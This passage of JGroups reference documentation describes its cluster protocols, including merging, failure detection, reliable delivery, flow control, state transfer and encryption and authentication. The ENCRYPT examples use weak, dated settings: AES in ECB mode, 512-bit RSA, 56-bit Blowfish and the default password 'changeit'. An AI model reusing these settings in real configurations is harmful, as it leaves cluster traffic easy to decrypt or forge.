subgroups\n+{A,B}+ and +{C,D,E}+ back into +{A,B,C,D,E}+,\nbut it does _not merge state_. The application has to handle the callback to merge\nstate. 
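\n\nAs a reference, a typical MERGE2 element might look like this (intervals are illustrative); a coordinator multicasts its presence at a random point between +$$min_interval$$+ and +$$max_interval$$+ milliseconds:\n\n[source,xml]\n----\n<!-- illustrative intervals, in ms -->\n<MERGE2 min_interval=\"10000\" max_interval=\"30000\" \/>\n----\n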
See <<HandlingNetworkPartitions>> for suggestions on merging states.\n\nFollowing a merge, the coordinator of the merged group can shift from the typical case of\n\"the coordinator is the member who has been up the longest.\" During the merge process, the coordinators\nof the various subgroups need to reach a common decision as to who the new coordinator is.\nIn order to ensure a consistent result, each coordinator combines the addresses of all the members\nin a list and then sorts the list. The first member in the sorted list becomes the coordinator.\nThe sort order is determined by the address implementation's comparison method; in practice, JGroups compares\nthe addresses based on their UUIDs. So, take a hypothetical case where two machines were running, with one machine running\nthree separate cluster members and the other running two. If communication between the machines were cut,\nthe following subgroups would form:\n+{A,B} and {C,D,E}+\nFollowing the merge, the new view would be: +{C,D,A,B,E}+, with C being the new\ncoordinator.\n \n\nNote that \"A\", \"B\" and so on are just logical names, attached to UUIDs, but the actual sorting is done\n on the actual UUIDs.\n \n${MERGE2}\n\nNOTE: `MERGE2` is deprecated and will be removed in 4.0. Users of it should switch to `MERGE3`.\n\n\n\n[[MERGE3]]\n==== MERGE3\n\nIf a cluster gets split for some reason (e.g. a network partition), this protocol merges the subclusters\nback into one cluster.\n\nAll members periodically send an INFO message with their address (UUID), logical name,\nphysical address and ViewId. The ViewId (<<ViewId>>) is used to see if we have diverging\nviews among the cluster members: periodically, every coordinator looks at the INFO messages received so\nfar and checks if there are any inconsistencies.\n\nIf inconsistencies are found, the _merge leader_ will be the member with the lowest address (UUID).\n\nThe merge leader then asks the senders of the inconsistent ViewIds for their full views. Once received,\nit simply passes a `MERGE` event up the stack, where the merge will be handled (by `GMS`) in exactly the same\nway as if `MERGE2` had generated the `MERGE` event.\n\nThe advantages of `MERGE3` compared to `MERGE2` are:\n\n* Sending of INFO messages is spread out over time, preventing message peaks which might cause\n packet loss. This is especially important in large clusters.\n* Only 1 merge should be running at any time. Competing merges, as can happen with `MERGE2`, slow\n down the merge process, and don't scale to large clusters.\n* An INFO message carries the logical name and physical address of a member. Compared to `MERGE2`,\n this allows us to immediately send messages to newly merged members, and not have to solicit\n this information first.\n* On the downside, `MERGE3` generates constant (small) traffic from all members.\n* `MERGE3` was written for an IP multicast-capable transport (`UDP`), but it also works with other\n transports (such as `TCP`), although it isn't as efficient on `TCP` as on `UDP`.\n\n\n===== Example\n\n[source,xml]\n----\n<MERGE3 max_interval=\"10000\" min_interval=\"5000\" check_interval=\"15000\"\/>\n----\n\nThis means that every member sends out an INFO message at a random interval in the range [5000 .. 10000] ms. Every\n15 seconds (`check_interval`), every coordinator checks if it received a ViewId differing from its own, and initiates\na merge if true.\n\n* We have subclusters `{A,B,C}`, `{D,E}` and `{F}`.
The subcluster coordinators are `A`, `D` and `F`\n* The network partition now heals\n* `D` checks its received ViewIds, and sees entries from itself and `A`\n** Since broadcasting of INFO messages is unreliable (as `MERGE3` is underneath `NAKACK2` in the stack), the last\n INFO message from `F` might have been dropped\n* `D` or `A` initiates a merge, which results in view `{A,B,C,D,E}`\n* A bit later, on the next check, `F` sees that its ViewId diverges from the ViewId sent in an INFO message by `C`\n* `F` and `A` initiate a new merge which results in merge view `{A,B,C,D,E,F}`\n\nIncreasing `check_interval` decreases the chance of partial merges (as shown above), but doesn't entirely eliminate them:\nmembers are not started at exactly the same time, and therefore their check intervals overlap.\nIf a member's interval elapsed just after receiving INFO messages from a subset of the subclusters\n(e.g. briefly after a partition healed), then we will still have a partial merge.\n\n${MERGE3}\n\n\n\n\n\n\n[[FailureDetection]]\n=== Failure Detection\n\nThe task of failure detection is to probe members of a group and see whether they are alive. When a member is\nsuspected of having failed, then a SUSPECT message is sent to all nodes of the cluster. It is not the task of the\nfailure detection layer to exclude a crashed member (this is done by the group membership protocol, GMS), but\nsimply to notify everyone that a node in the cluster is suspected of having crashed.\n\nThe SUSPECT message is handled by the GMS protocol of the current coordinator only; all other members ignore it.\n \n\n[[FD]]\n==== FD\n\nFailure detection based on a logical ring and heartbeat messages.\n\nMembers form a logical ring; e.g. in view `{A,B,C,D}`, `A` pings `B`, which pings `C`, which pings `D`, which pings `A`.\n'Pinging' means sending a heartbeat.\n\nEach member sends this heartbeat every `timeout` ms to the neighbor to its right. When a member receives a heartbeat, it\nsends back an ack. When the ack is received the timestamp of when a member last heard from its neighbor is reset.\n\nWhen a member doesn't receive any heartbeat acks from its neighbor for `timeout` * `max_tries` ms,\nthat member is declared suspected, and will be excluded by GMS.\n\nThis is done by `FD` multicasting a `SUSPECT(P)` message which is handled by the current coordinator by double-checking\nthe health of `P` (using `VERIFY_SUSPECT`) and - if `P` still doesn't reply - by excluding `P` from the membership.\n\nNote that setting `msg_counts_as_heartbeat` in `P` to true causes the timestamp of `P` in the pinging member to be\nreset.\n\n===== Example\n\n[source,xml]\n----\n<FD timeout=\"3000\" max_tries=\"4\" \/>\n----\n* The membership is `{A,B,C,D,E}`.\n* Now C and D crash at the same time\n* B's next heartbeats won't get an ack\n* After roughly 12 seconds (4 * 3 secs), B suspects C\n** B now starts sending heartbeats to D\n* A (the coordinator) handles the `SUSPECT(C)` message from B and uses `VERIFY_SUSPECT` to double-check that C is really dead\n* After `VERIFY_SUSPECT.timeout` ms, A creates a new view `{A,B,D,E}` excluding C\n* After ca. 12 seconds, B sends a `SUSPECT(D)` message to the coordinator, which eventually also excludes `D`\n\n\n\n${FD}\n\n\n\n[[FD_ALL]]\n==== FD_ALL\n\nFailure detection based on simple heartbeat protocol. Every member periodically multicasts a heartbeat.\nEvery member also maintains a table of all members (minus itself). 
When data or a heartbeat from P are\nreceived, we reset the timestamp for P to the current time.\nPeriodically, we check for expired members whose timestamp is greater than the timeout, and suspect those.\n\n===== Example\n\n[source,xml]\n----\n<FD_ALL timeout=\"12000\" interval=\"3000\" timeout_check_interval=\"2000\"\/>\n----\n* The membership is `{A,B,C,D,E}`.\n* Every member broadcasts a heartbeat every 3 seconds. When received, the sender's timestamp in the table\n is set to the current time\n* Every member also checks every 2 seconds if any member's timestamp exceeds the timeout and suspects\n that member if this is the case\n* Now C and D crash at the same time\n* After roughly 12-13 seconds, `A` broadcasts a `SUSPECT(C,D)` message\n* The coordinator (`A`) uses `VERIFY_SUSPECT` to double check if `C` and `D` are dead\n* `A` creates a new view `{A,B,E}` which excludes `C` and `D`\n\nNOTE: Contrary to `FD` which suspects adjacent crashed members `C` and `D` one by one, `FD_ALL` suspects `C` and `D` in\nconstant time. `FD` takes `N` * (`timeout` * `max_tries`) ms, whereas `FD_ALL` takes `timeout` ms\n\n${FD_ALL}\n\n\n\n[[FD_ALL2]]\n==== FD_ALL2\n\nSimilar to `FD_ALL`, but doesn't use any timestamps. Instead, a boolean flag is associated with each\nmember. When a message or heartbeat (sent every `interval` ms) from P is received, P's flag is set to true.\nThe heartbeat checker checks every `timeout` ms for members whose flag is false, suspects those, and\n- when done - resets all flags to false again.\nThe times it takes to suspect a member are the same as for `FD_ALL`\n \n\n${FD_ALL2}\n\n\n\n[[FD_SOCK]]\n==== FD_SOCK\n\nFailure detection protocol based on a ring of TCP sockets created between cluster members, similar to `FD` but\nnot using heartbeat messages.\n\nEach member in a cluster connects to its neighbor (the last member connects to the first), thus forming a ring.\nMember `B` is suspected when its neighbor `A` detects abnormal closing of its TCP socket\n(presumably due to a crash of `B`). However, if `B` is about to leave gracefully, it lets its neighbor `A`\nknow, so that `A` doesn't suspect `B`.\n \n===== Example\n* The membership is `{A,B,C,D,E}`.\n* Members `C` and `D` are killed at the same time\n* `B` notices that `C` abnormally closed its TCP socket and broadcasts a `SUSPECT(C)` message\n* The current coordinator (`A`) asks `VERIFY_SUSPECT` to double check that `C` is dead\n* Meanwhile, `B` tries to create a TCP socket to the next-in-line (`D`) but fails. It therefore broadcasts a\n `SUSPECT(D)` message\n* `A` also handles this message and asks `VERIFY_SUSPECT` to double check if `D` is dead\n* After `VERIFY_SUSPECT` can't verify that `C` and `D` are still alive, `A` creates a new view\n `{A,B,E}` and installs it\n* The time taken for `FD_SOCK` to suspect a member is very small (a few ms)\n\nNOTE: It is recommended to use `FD_SOCK` and `FD` or `FD_ALL` together in the same stack: `FD_SOCK` detects killed\nnodes immediately, and `FD_ALL` (with a higher timeout) detects hung members or kernel panics \/ crashed switches\n(which don't close the TCP connection) after the timeout.\n \n\n${FD_SOCK}\n\n\n[[FD_HOST]]\n==== FD_HOST\n\nTo detect the crash or freeze of entire hosts and all of the cluster members running on them, `FD_HOST`\ncan be used. 
It is not meant to be used in isolation, as it doesn't detect crashed members on the\nlocal host, but in conjunction with other failure detection protocols, such as `FD_ALL` or `FD_SOCK`.\n\n`FD_HOST` can be used when we have multiple cluster members running on a physical box. For example,\nif we have members `{A,B,C,D}` running on host 1 and `{M,N,O,P}` running on host 2, and host 1 is\npowered down, then `A`, `B`, `C` and `D` are suspected and removed from the cluster together, typically\nin one view change.\n\nBy default, `FD_HOST` uses `InetAddress.isReachable()` to perform liveness checking of other hosts, but\nif property `cmd` is set, then any script or command can be used. `FD_HOST` will launch the command and\npass the IP address of the host to be checked as an argument. Example: `cmd=\"ping -c 3\"`.\n\nA typical failure detection configuration would look like this:\n\n[source,xml]\n----\n...\n<FD_SOCK\/>\n<FD_ALL timeout=\"60000\" interval=\"20000\"\/>\n<FD_HOST interval=\"10000\" timeout=\"35000\" \/>\n...\n----\n\nIf we have members `{A,B,C}` on host `192.168.1.3`, `{M,N,O}` on `192.168.1.4` and `{X,Y,Z}` on `192.168.1.5`, then\nthe behavior is as follows:\n\n.Failure detection behavior\n[options=\"header\"]\n|===============\n|Scenario|Behavior\n|Any member (say `O`) crashes|\n `FD_SOCK` detects this immediately (as the TCP socket was closed). `O` is suspected and\n removed\n \n|Member `Y` hangs|\n `FD_ALL` starts missing heartbeats from `Y` (note that host `192.168.1.5` is up) and suspects\n `Y` after 60 seconds. `Y` is removed from the view.\n \n|Host `192.168.1.3` is shut down (`shutdown -h now`)|\n Since this is a graceful shutdown, the OS closes all sockets. `FD_SOCK` therefore\n suspects `A`, `B` and `C` and removes them from the view immediately.\n \n|The power supply to host `192.168.1.3` is cut, or `192.168.1.3` panicked|\n `FD_HOST` detects that `192.168.1.3` is not alive and suspects `A`, `B` and `C` after ~35 to 45s.\n \n|Member `N` leaves|\n Since this is a graceful leave, none of the failure detection protocols kick in\n \n\n|===============\n\n\n${FD_HOST}\n\n\n\n==== VERIFY_SUSPECT\n\nVerifies that a suspected member is really dead by pinging that member one last time before excluding it,\n and dropping the suspect message if the member does respond.\n \n\nVERIFY_SUSPECT tries to minimize false suspicions.\n \n\nThe protocol works as follows: it catches SUSPECT events traveling up the stack.\n Then it verifies that the suspected member is really dead. If yes, it passes the SUSPECT event up the\n stack, otherwise it discards it. VERIFY_SUSPECT has to be placed somewhere above the failure detection\n protocol and below the GMS protocol (receiver of the SUSPECT event). Note that SUSPECT events may be
Note that SUSPECT events may be\n reordered by this protocol.\n \n\n${VERIFY_SUSPECT}\n\n\n\n[[ReliableMessageTransmission]]\n\n\n=== Reliable message transmission\n\n[[NAKACK]]\n\n\n==== pbcast.NAKACK\n\nNAKACK provides reliable delivery and FIFO (= First In First Out) properties for messages sent to all\n nodes in a cluster.\n \n\nReliable delivery means that no message sent by a sender will ever be lost, as all messages are\nnumbered with sequence numbers (by sender) and retransmission requests are sent to the sender of\na message if that sequence number is not received.\n\nNOTE: Note that NAKACK can also be configured to send retransmission requests for M to _anyone_ in the cluster,\n rather than only to the sender of M.\n\n\nFIFO order means that all messages from a given sender are received in exactly the order in which\n they were sent.\n \n\nNAKACK is a Lossless and FIFO delivery of multicast messages, using negative acks. E.g. when\n receiving P:1, P:3, P:4, a receiver delivers only P:1, and asks P for retransmission of message 2,\n queuing P3-4. When P2 is finally received, the receiver will deliver P2-4 to the application.\n \n\n${NAKACK}\n\n[[NAKACK2]]\n\n\n==== NAKACK2\n\nNAKACK2 was introduced in 3.1 and is a successor to NAKACK (at some point it will replace NAKACK). It\n has the same properties as NAKACK, but its implementation is faster and uses less memory, plus it\n creates fewer tasks in the timer.\n \n\nSome of the properties of NAKACK were deprecated in NAKACK2, but were not removed so people can simply\n change from NAKACK to NAKACK2 by changing the protocol name in the config.\n \n\n${NAKACK2}\n\n[[UNICAST]]\n\n\n==== UNICAST\n\nUNICAST provides reliable delivery and FIFO (= First In First Out) properties for point-to-point\n messages between one sender and one receiver.\n \n\nReliable delivery means that no message sent by a sender will ever be lost, as all messages are\n numbered with sequence numbers (by sender) and retransmission requests are sent to the sender of\n a message if that sequence number is not received.\n \n\nFIFO order means that all messages from a given sender are received in exactly the order in which\n they were sent.\n \n\nUNICAST uses _positive acks_ for retransmission; sender A keeps sending\n message M until receiver B delivers M and sends an ack(M) to A, or until B leaves the cluster or A\n crashes.\n \n\nAlthough JGroups attempts to send acks selectively, UNICAST will still see a lot of acks on the wire.\n If this is not desired, use UNICAST2 (see <<UNICAST2>>).\n \n\nOn top of a reliable transport, such as TCP, UNICAST is not really needed. However, concurrent\n delivery of messages from the same sender is prevented by UNICAST by acquiring a lock on the sender's\n retransmission table, so unless concurrent delivery is desired, UNICAST should not be removed from\n the stack even if TCP is used.\n \n\n${UNICAST}\n\n[[UNICAST2]]\n\n\n==== UNICAST2\n\nUNICAST2 provides lossless, ordered, communication between 2 members. Contrary to UNICAST, it\n uses _negative acks_ (similar to NAKACK) rather than positive acks. This reduces the communication\n overhead required for sending an ack for every message.\n \n\nNegative acks have sender A simply send messages without retransmission, and receivers never ack\n messages, until they detect a gap: for instance, if A sends messages 1,2,4,5, then B delivers 1 and 2,\n but queues 4 and 5 because it is missing message 3 from A. B then asks A to retransmit 3. 
When 3 is\n received, messages 3, 4 and 5 can be delivered to the application.\n \n\nCompared to a positive ack scheme as used in UNICAST, negative acks have the advantage that they generate\n less traffic: if all messages are received in order, we never need to do retransmission.\n \n\n${UNICAST2}\n\n[[UNICAST3]]\n\n\n==== UNICAST3\n\nUNICAST3 (available in 3.3) is the successor to UNICAST2, but is based on UNICAST, as it uses a\n positive acknowledgment mechanism. However, speed-wise it is similar to UNICAST2.\n \n\nDetails of UNICAST3's design can be found here:\n link:$$https:\/\/github.com\/belaban\/JGroups\/blob\/master\/doc\/design\/UNICAST3.txt$$[UNICAST3]\n \n\n${UNICAST3}\n\n[[RSVP]]\n\n\n==== RSVP\n\nThe RSVP protocol is not a reliable delivery protocol per se, but augments reliable protocols such\n as NAKACK, UNICAST or UNICAST2. It should be placed somewhere _above_ these in\n the stack.\n \n\n${RSVP}\n\n[[STABLE]]\n\n\n=== Message stability\n\nTo serve potential retransmission requests, a member has to store received messages until it is known\n that every member in the cluster has received them. Message stability for a given message M means that M\n has been seen by everyone in the cluster.\n \n\nThe stability protocol periodically (or when a certain number of bytes have been received) initiates a\n consensus protocol, which multicasts a stable message containing the highest message numbers for a\n given member. This is called a digest.\n \n\nWhen everyone has received everybody else's stable messages, a digest is computed which consists of the\n minimum sequence numbers of all received digests so far. This is the stability vector, and contains only\n message sequence numbers that have been seen by everyone.\n \n\nThis stability vector is then broadcast to the group and everyone can remove messages from their\n retransmission tables whose sequence numbers are smaller than the ones received in the stability vector.\n These messages can then be garbage collected.\n \n\n\n\n==== STABLE\n\nSTABLE garbage collects messages that have been seen by all members of a cluster. Each member has to\n store all messages because it may be asked to retransmit. Only when we are sure that all members have\n seen a message can it be removed from the retransmission buffers. STABLE periodically gossips its\n highest and lowest messages seen. The lowest value is used to compute the min (all lowest seqnos\n for all members), and messages with a seqno below that min can safely be discarded.\n \n\nNote that STABLE can also be configured to run when N bytes have been received. This is recommended\n when sending messages at a high rate, because sending stable messages based on time might accumulate\n messages faster than STABLE can garbage collect them.\n \n\n${STABLE}\n
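\nAs a reference, a STABLE configuration combining time-based gossiping with a byte-count trigger might look like this (the values mirror common stock configurations, but are illustrative here):\n\n[source,xml]\n----\n<!-- illustrative: gossip on average every 50s, or once 4MB have been received -->\n<pbcast.STABLE stability_delay=\"1000\"\n desired_avg_gossip=\"50000\"\n max_bytes=\"4M\"\/>\n----\n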
The algorithm for\n joining a new member is essentially:\n \n\n\n----\n\n- loop\n- find initial members (discovery)\n- if no responses:\n - become singleton group and break out of the loop\n- else:\n - determine the coordinator (oldest member) from the responses\n - send JOIN request to coordinator\n - wait for JOIN response\n - if JOIN response received:\n - install view and break out of the loop\n - else\n - sleep for 5 seconds and continue the loop\n \n----\n\n\n\n==== pbcast.GMS\n\n${GMS}\n\n\n\n===== Joining a new member\n\nConsider the following situation: a new member wants to join a\n group. The prodedure to do so is:\n \n\n* Multicast an (unreliable) discovery request (ping)\n* Wait for n responses or m milliseconds (whichever is first)\n* Every member responds with the address of the coordinator\n* If the initial responses are > 0: determine the coordinator and start the JOIN protocol\n* If the initial response are 0: become coordinator, assuming that no one else is out there\n\nHowever, the problem is that the initial mcast discovery request\nmight get lost, e.g. when multiple members start at the same time, the\noutgoing network buffer might overflow, and the mcast packet might get\ndropped. Nobody receives it and thus the sender will not receive any\nresponses, resulting in an initial membership of 0. This could result in\nmultiple coordinators, and multiple subgroups forming. How can we overcome\nthis problem ? There are two solutions:\n\n. Increase the timeout, or number of responses received. This will\n only help if the reason of the empty membership was a slow host. If\n the mcast packet was dropped, this solution won't help\n. Add the MERGE2 or MERGE3 protocol. This doesn't actually prevent\n multiple initial cordinators, but rectifies the problem by merging\n different subgroups back into one. Note that this might involve state\n merging which needs to be done by the application.\n \n\n\n[[FlowControl]]\n=== Flow control\n\nFlow control takes care of adjusting the rate of a message sender to the rate of the slowest receiver over time.\n If a sender continuously sends messages at a rate that is faster than the receiver(s), the receivers will\n either queue up messages, or the messages will get discarded by the receiver(s), triggering costly\n retransmissions. In addition, there is spurious traffic on the cluster, causing even more retransmissions.\n \n\nFlow control throttles the sender so the receivers are not overrun with messages.\n \n\nNote that flow control can be bypassed by setting message flag Message.NO_FC. See <<MessageFlags>>\n for details.\n \n\nThe properties for FlowControl are shown below and can be used in\n MFC and UFC:\n \n\n${FlowControl}\n\n\n\n==== FC\n\nFC uses a credit based system, where each sender has +$$max_credits$$+ credits and decrements\n them whenever a message is sent. The sender blocks when the credits fall below 0, and only resumes\n sending messages when it receives a replenishment message from the receivers.\n \n\nThe receivers maintain a table of credits for all senders and decrement the given sender's credits\n as well, when a message is received.\n \n\nWhen a sender's credits drops below a threshold, the receiver will send a replenishment message to\n the sender. The threshold is defined by +$$min_bytes$$+ or +$$min_threshold$$+.\n \n\n${FC}\n\n\nNOTE: FC has been deprecated, use MFC and UFC instead\n\n\n==== MFC and UFC\n\nIn 2.10, FC was separated into MFC (Multicast Flow Control) and Unicast Flow Control (UFC). 
==== FC

FC uses a credit based system, where each sender has +$$max_credits$$+ credits and decrements
them whenever a message is sent. The sender blocks when the credits fall below 0, and only resumes
sending messages when it receives a replenishment message from the receivers.

The receivers maintain a table of credits for all senders and decrement the given sender's credits
as well, when a message is received.

When a sender's credits drop below a threshold, the receiver will send a replenishment message to
the sender. The threshold is defined by +$$min_bytes$$+ or +$$min_threshold$$+.

${FC}


NOTE: FC has been deprecated, use MFC and UFC instead


==== MFC and UFC

In 2.10, FC was separated into MFC (Multicast Flow Control) and UFC (Unicast Flow Control). The reason
was that multicast flow control should not be impeded by unicast flow control, and vice versa. Also,
performance of the separate implementations could be increased, plus they can be individually omitted.
For example, if no unicast flow control is needed, UFC can be left out of the stack configuration.

[[MFC]]

===== MFC

MFC has currently no properties other than those inherited from FlowControl (see above).

${MFC}

[[UFC]]

===== UFC

UFC has currently no properties other than those inherited from FlowControl (see above).

${UFC}


=== Fragmentation


==== FRAG and FRAG2

FRAG and FRAG2 fragment large messages into smaller ones, send the smaller ones, and at the receiver
side, the smaller fragments will get assembled into larger messages again, and delivered to the
application. FRAG and FRAG2 work for both unicast and multicast messages.

The difference between FRAG and FRAG2 is that FRAG2 does one less copy than FRAG, so it is the recommended
fragmentation protocol. FRAG serializes a message to know the exact size required (including headers),
whereas FRAG2 only fragments the payload (excluding the headers), so it is faster.

The properties of FRAG2 are:

${FRAG2}

Contrary to FRAG, FRAG2 does not need to serialize a message in order to break it into smaller
fragments: it looks only at the message's buffer, which is a byte array anyway. We assume that the
size addition for headers and src and dest addresses is minimal when the transport finally has to
serialize the message, so we add a constant (by default 200 bytes). Because of the efficiency gained by
not having to serialize the message just to determine its size, FRAG2 is generally recommended over FRAG.
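For instance, to fragment messages larger than roughly 60KB (an illustrative value; `frag_size` should
be chosen so that a fragment plus its headers still fits into what the transport can send in one packet):

[source,xml]
----
<FRAG2 frag_size="60K"/>
----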
=== Ordering

[[SEQUENCER]]

==== SEQUENCER

SEQUENCER provides total order for multicast (=group) messages by forwarding messages to the current
coordinator, which then sends the messages to the cluster on behalf of the original sender. Because it
is always the same sender (whose messages are delivered in FIFO order), a global (or total) order
is established.

Sending members add every forwarded message M to a buffer and remove M when they receive it. Should
the current coordinator crash, all buffered messages are forwarded to the new coordinator.

${SEQUENCER}

[[TOA]]

==== Total Order Anycast (TOA)

A total order anycast is a totally ordered message sent to a subset of the cluster members. TOA
intercepts messages with an AnycastMessage (carrying a list of addresses) and handles sending of the
message in total order. Say the cluster is {A,B,C,D,E} and the anycast is to {B,C}.

Skeen's algorithm is used to send the message: B and C each maintain a logical clock (a counter).
When a message is to be sent, TOA contacts B and C and asks them for their counters. B and C return
their counters (incrementing them for the next request).

The originator of the message then sets the message's ID to be the max of all returned counters and
sends the message. Receivers then deliver the messages in order of their IDs.

The main use of TOA is currently in Infinispan's transactional caches with partial replication: it
is used to apply transactional modifications in total order, so that no two-phase commit protocol
has to be run and no locks have to be acquired.

As shown in link:$$http://www.cloudtm.eu/home/Publications$$["Exploiting Total Order Multicast in Weakly Consistent Transactional Caches"],
when we have many conflicts by different transactions modifying the same keys, TOM fares better than 2PC.

Note that TOA is experimental (as of 3.1).

${tom.TOA}

[[StateTransferProtocolDetails]]

=== State Transfer

[[pbcast.STATE_TRANSFER]]

==== pbcast.STATE_TRANSFER

STATE_TRANSFER is the existing transfer protocol, which transfers byte[] buffers around. However, at the
state provider's side, JGroups creates an output stream over the byte[] buffer and passes the
output stream to the getState(OutputStream) callback, and at the state requester's side, an input
stream is created and passed to the setState(InputStream) callback.

This allows us to continue using STATE_TRANSFER until new state transfer protocols replace it
(perhaps in 4.0).

In order to transfer application state to a joining member of a cluster, STATE_TRANSFER has to load the
entire state into memory and send it to the joining member. The major limitation of this approach is that
very large state transfers would likely result in memory exhaustion.

For large state transfers use either the STATE or STATE_SOCK protocol. However, if the state is small,
STATE_TRANSFER is okay.

${STATE_TRANSFER}

[[StreamingStateTransfer]]

==== StreamingStateTransfer

StreamingStateTransfer is the superclass of STATE and STATE_SOCK (see below). Its properties are:

${StreamingStateTransfer}

[[pbcast.STATE]]

==== pbcast.STATE


===== Overview

STATE was renamed from (2.x) STREAMING_STATE_TRANSFER, and refactored to extend a common superclass
StreamingStateTransfer. The other state transfer protocol extending StreamingStateTransfer is
STATE_SOCK (see <<STATE_SOCK>>).

STATE uses a _streaming approach_ to state transfer: the state provider writes its state to the output
stream passed to it in the getState(OutputStream) callback, and the stream chunks up the data and sends
the chunks to the state requester in separate messages.

The state requester receives those chunks and feeds them into the input stream from which the
state is read by the setState(InputStream) callback.

The advantage compared to STATE_TRANSFER is that state provider and requester only need small
(transfer) buffers to keep a part of the state in memory, whereas STATE_TRANSFER needs to copy
the _entire_ state into memory.

If we for example have a list of 1 million elements, then STATE_TRANSFER would have to create a
byte[] buffer out of it, and return the byte[] buffer, whereas a streaming approach could iterate
through the list and write each list element to the output stream.
Whenever the buffer capacity is reached, we'd then send a message, and the buffer would be reused to
receive more data.


===== Configuration

STATE has currently no properties other than those inherited from StreamingStateTransfer (see above).

[[pbcast.STATE_SOCK]]

==== STATE_SOCK

STATE_SOCK is also a streaming state transfer protocol, but compared to STATE, it doesn't send the chunks
as messages; instead it uses a TCP socket connection between state provider and requester to transfer the state.

The state provider creates a server socket at a configurable bind address and port, and the address
and port are sent back to a state requester in the state response. The state requester then establishes
a socket connection to the server socket and passes the socket's input stream to the
setState(InputStream) callback.


===== Configuration

The configuration options of STATE_SOCK are listed below:

${STATE_SOCK}
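As a small sketch (the address and port are made up), the provider's server socket can be pinned to a
specific interface and port via the configurable bind address and port mentioned above:

[source,xml]
----
<STATE_SOCK bind_addr="192.168.1.5" bind_port="7500"/>
----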
[[BARRIER]]

==== BARRIER

BARRIER is used by some of the state transfer protocols, as it lets existing threads complete and blocks
new threads, to get both the digest and state in one go.

In 3.1, a new mechanism for state transfer will be implemented, eliminating the need for BARRIER. Until
then, BARRIER should be used when one of the state transfer protocols is used. BARRIER is
part of every default stack which contains a state transfer protocol.

${BARRIER}


=== pbcast.FLUSH

Flushing forces group members to send all their pending messages prior to a certain event. The process
of flushing acquiesces the cluster so that state transfer or a join can be done. It is also called the
stop-the-world model, as nobody will be able to send messages while a flush is in process. Flush is used in:


State transfer:: When a member requests state transfer, it tells everyone to stop sending messages and
waits for everyone's ack. Once it has received everyone's acks, the application asks the coordinator for
its state, which is shipped back to the requester. After the requester has received and set the state
successfully, the requester tells everyone to resume sending messages.
View changes (e.g. a join):: Before installing a new view V2, flushing ensures that all messages _sent_
in the current view V1 are indeed _delivered_ in V1, rather than in V2 (in all non-faulty members).
This is essentially Virtual Synchrony.


FLUSH is designed as another protocol positioned just below the channel, on top of the stack
(e.g. above STATE_TRANSFER). The STATE_TRANSFER and GMS protocols request a flush by sending an event
up the stack, where it is handled by the FLUSH protocol. Another event is sent back by the FLUSH
protocol to let the caller know that the flush has completed. When done (e.g. the view was installed or
the state transferred), the protocol sends a message, which will allow everyone in the cluster to
resume sending.

A channel is notified that the FLUSH phase has been started by the Receiver.block() callback.

Read more about flushing in <<Flushing>>.

${FLUSH}

[[Misc]]

=== Misc

[[STATS]]

==== Statistics

STATS exposes various statistics, e.g. the number of received multicast and unicast messages, the number
of bytes sent etc. It should be placed directly over the transport.

${STATS}

[[Security]]

==== Security

JGroups provides protocols to encrypt cluster traffic (ENCRYPT), and to make sure that only
authorized members can join a cluster (AUTH and SASL).

[[ENCRYPT]]

===== ENCRYPT

A detailed description of ENCRYPT is found in the JGroups source (__JGroups/doc/ENCRYPT.html__).
By default, encryption only covers the message body, not the message headers.
To encrypt the entire message (including all headers, plus destination and source addresses),
the property ++$$encrypt_entire_message$$++ has to be set to true.
Also, ENCRYPT has to be below any protocols whose headers we want to encrypt, e.g.


[source,xml]
----
<config ... >
    <UDP />
    <PING />
    <MERGE2 />
    <FD />
    <VERIFY_SUSPECT />
    <ENCRYPT encrypt_entire_message="false"
             sym_init="128" sym_algorithm="AES/ECB/PKCS5Padding"
             asym_init="512" asym_algorithm="RSA"/>
    <pbcast.NAKACK />
    <UNICAST />
    <pbcast.STABLE />
    <FRAG2 />
    <pbcast.GMS />
</config>
----

Note that ENCRYPT sits below NAKACK and UNICAST, so the sequence numbers for these 2 protocols will
be encrypted. Had ENCRYPT been placed below UNICAST but above NAKACK, then only UNICAST's headers
(including sequence numbers) would have been encrypted, but not NAKACK's.

Note that it doesn't make too much sense to place ENCRYPT even lower in the stack, because then
almost all traffic (even merge or discovery traffic) will be encrypted, which may be somewhat of
a performance drag.

When we encrypt an entire message, we have to marshal the message into a byte buffer first and
then encrypt it. This entails marshalling and copying of the byte buffer, which is not ideal
performance-wise.


.Using a key store
ENCRYPT uses the store type JCEKS, whereas +keytool+ uses JKS by default; therefore a keystore
generated with keytool's default store type will not be accessible to ENCRYPT.

To generate a keystore compatible with JCEKS, use the following command line options to keytool:


----
keytool -genseckey -alias myKey -keypass changeit -storepass changeit -keyalg Blowfish -keysize 56 -keystore defaultStore.keystore -storetype JCEKS
----

ENCRYPT could then be configured as follows:


[source,xml]
----
<ENCRYPT key_store_name="defaultStore.keystore"
         store_password="changeit"
         alias="myKey"/>
----

Note that defaultStore.keystore will have to be found in the classpath.


NOTE: If asymmetric encryption is used (no shared key via a keystore), ENCRYPT has to be placed somewhere _above_ GMS,
or else the JOIN process would not function (as the JOIN response would get dropped).

${ENCRYPT}

[[AUTH]]

===== AUTH

AUTH is used to provide a layer of authentication to JGroups. This allows you to define pluggable
security that decides whether a node should be allowed to join a cluster. AUTH sits below the GMS
protocol and listens for JOIN REQUEST messages. When a JOIN REQUEST is received, it tries to find
an AuthHeader object, inside of which should be an implementation of the AuthToken object.

AuthToken is an abstract class, implementations of which are responsible for providing the
actual authentication mechanism. Some basic implementations of AuthToken are provided in the
org.jgroups.auth package (SimpleToken, MD5Token and X509Token). Effectively, all these implementations
do is encrypt a string (found in the JGroups config) and pass that on with the JOIN REQUEST.

When authentication is successful, the message is simply passed up the stack to the GMS protocol.
When it fails, the AUTH protocol creates a JOIN RESPONSE message with a failure string and passes
it back down the stack. This failure string informs the client of the reason for failure.
Clients will then fail to join the group and will throw a SecurityException.
If this error string is null then authentication is considered to have passed.

For more information refer to the wiki at http://community.jboss.org/wiki/JGroupsAUTH[AUTH].

${AUTH}
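As an illustrative sketch (the shared secret is made up), AUTH with an MD5-hashed shared token,
placed just below GMS, could look like this:

[source,xml]
----
<AUTH auth_class="org.jgroups.auth.MD5Token"
      auth_value="mysecret"
      token_hash="MD5"/>
<pbcast.GMS/>
----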
[[SASL]]

===== SASL

SASL is an alternative to the AUTH protocol which provides a layer of authentication to JGroups by allowing the
use of one of the SASL mechanisms made available by the JDK. SASL sits below the GMS protocol and listens for
JOIN / MERGE REQUEST messages. When a JOIN / MERGE REQUEST is received, it tries to find a SaslHeader object
